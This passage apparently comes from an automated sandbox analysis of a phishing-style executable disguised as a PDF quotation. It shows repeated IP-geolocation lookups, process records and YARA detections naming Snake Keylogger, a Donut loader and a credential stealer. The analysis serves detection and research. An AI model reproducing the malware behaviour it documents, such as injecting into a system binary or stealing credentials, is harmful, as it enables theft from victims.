2024-10-04 09:24:21 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-04 09:24:22 UTC	682	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65652 Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qn331nq%2FFpv28%2B1tm6NvsjcLfAYAxIG8Hm%2FJCT1fKJOMYqZA%2BlaCZKQ2dt1TDz1sVVWMuI4LPeL1NlrHvEMLtBwoRB2CNSFYUiHqGNvETARX0GVscTbuo4H2Ma8D%2B%2BFB4ln9HU6t"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cd41e554e8b78d6-EWR
2024-10-04 09:24:22 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-04 09:24:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49715	188.114.96.3	443	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 09:24:22 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-04 09:24:22 UTC	674	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65653 Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=06dM%2FN0sB7cx1OQcV2PoxL9RutgPNwQ77vqfxrBrKUqI%2FGRQN9SnMG9d5FEN4PJQLQMapNrEytLUSY2PZh3B0qv0IYDxaoBFqtpGMue8vtOIT35BlnF1WyH72a4pT8ku9o29gcsd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cd41e5a4eed7c8a-EWR
2024-10-04 09:24:22 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-04 09:24:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49717	188.114.96.3	443	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 09:24:23 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-04 09:24:24 UTC	676	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65654 Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OBDbISfBGJNfpsKFwxzoqF%2B4OroELcK%2F%2FQlW7AdPop7SqPyXgWRdnk1hmb3hjOXfWKeTIEtQk63E1PeUnV4q5oUWhaLgli8HJrxcUkfb6PYpSAQbb69ydLXW2aQpSGCVFXUxFdgC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cd41e61ab524231-EWR
2024-10-04 09:24:24 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-04 09:24:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49719	188.114.96.3	443	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 09:24:25 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-04 09:24:25 UTC	674	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65656 Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LiOtb0il8BNPWkfX5bm6uR6g7EvhpBfqkbvrjuIlUnOuvIhm0pXuocjwTKiowDiA4IMWgC0uLn97pimT5jE5jf7nAlVFnsdvn0lbt%2BOdDy3triWw4sH5CaJSr6zg%2FH0mw0shEtIA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cd41e690c90c46b-EWR
2024-10-04 09:24:25 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-04 09:24:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49721	188.114.96.3	443	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 09:24:26 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-04 09:24:26 UTC	678	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:26 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65657 Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mqM6gZWlq2Z1Xke51YIbbYHAbt97qn2DlIohByJGQ3xQ%2FLtuzR%2FgC3ebwXo0wjwYrtCxF6NJcWDdwfoSgyhuMU3XeXODCAju%2BH0xEnHJJPi0%2BxXI5hvdeKZHcisoJgFNcJQvmXzH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cd41e721a778ccd-EWR
2024-10-04 09:24:26 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-04 09:24:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49723	188.114.96.3	443	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 09:24:27 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-04 09:24:27 UTC	670	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65658 Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=17J9dssevwFw76DaRbkZKHanDziCS8O3ud2CppeugHN7WMIECd68uQadUL6e7FcUB1UuGjMDdCY3fvCbssZ928GjGFuL1GdikFClyGsVWXjDMEa4UoS9QlkPulZWK9P7WNBbf827"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cd41e796fd54235-EWR
2024-10-04 09:24:27 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-04 09:24:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49725	188.114.96.3	443	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 09:24:28 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-04 09:24:28 UTC	672	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65659 Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V9BgtLmUy%2BrvVYNTjdOEpQxqfQcEUjE96plnCBJvCnXWBY7EOc7VKwfGnx6y4UnI5fm3dqUziovCeCMVTsFhmF42TeC0ru4ILa0P338UTftX1qHXwrukm54MI1YpYAY8ClliSrTu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cd41e80df420f43-EWR
2024-10-04 09:24:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-04 09:24:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49727	188.114.96.3	443	7848	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 09:24:30 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-04 09:24:30 UTC	682	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:24:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65661 Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8v2euuSPy%2B%2F716hhSPtrBuJi%2BLM9MRCtKEgUWUcarVztGtiY9pCIZUBYcvjeqhlp3XnCddFfIp4exs%2F4YnGXWxl9ra0VviarRg2U20CU%2FGQ9SicMvXHteWgvz5ENuozTxTn%2B1tNh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cd41e885eed727d-EWR
2024-10-04 09:24:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-04 09:24:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	05:23:24
Start date:	04/10/2024
Path:	C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe"
Imagebase:	0x17a0b6b0000
File size:	1'479'168 bytes
MD5 hash:	2841A5211DD5EEE5BCC3C3048B5D00DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1934071386.0000017A26210000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1922304917.0000017A0D6A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1922304917.0000017A0D856000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:24:15
Start date:	04/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x1ae69220000
File size:	55'824 bytes
MD5 hash:	DF5419B32657D2896514B6A1D041FE08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000005.00000002.2656855245.000001AE692A0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2654091935.000001AE0024B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2654091935.000001AE00001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	05:24:16
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 00007FF887CD01FD Relevance: 7.4, Strings: 5, Instructions: 1186COMMON

Download Yara Rule

Strings

(Lp, xrefs: 00007FF887CD0970
A0_^, xrefs: 00007FF887CD0301
C0_I, xrefs: 00007FF887CD0404
6f, xrefs: 00007FF887CD069E
0Xp, xrefs: 00007FF887CD0814

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 6f$(Lp$0Xp$A0_^$C0_I
API String ID: 0-3030579568
Opcode ID: 8bcf6e9a8117d948126a2e937798994aa7ca9b8bfe41c8e4c1b48ff686d6f044
Instruction ID: 52edaba177503760e4d5e3f3dd099f81c66fd5ce5ddbd3947e3d30df6f4ce165
Opcode Fuzzy Hash: 8bcf6e9a8117d948126a2e937798994aa7ca9b8bfe41c8e4c1b48ff686d6f044
Instruction Fuzzy Hash: 0382C331A18A8A4FE758EE2CD4957B97BE2FF95750F140179D459C7283CE34E882C782

Function 00007FF887CD0280 Relevance: 7.1, Strings: 5, Instructions: 847COMMON

Download Yara Rule

Strings

(Lp, xrefs: 00007FF887CD0970
A0_^, xrefs: 00007FF887CD0301
C0_I, xrefs: 00007FF887CD0404
6f, xrefs: 00007FF887CD069E
0Xp, xrefs: 00007FF887CD0814

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 6f$(Lp$0Xp$A0_^$C0_I
API String ID: 0-3030579568
Opcode ID: 0ad4594046b1ba41bdf0efe7631620ce8f9f200419d2a9fe52358bd65fd6d696
Instruction ID: c6f45a28ce08f4295d7e2485ba575e0595d19288666ee13133c9267fc8fb75a7
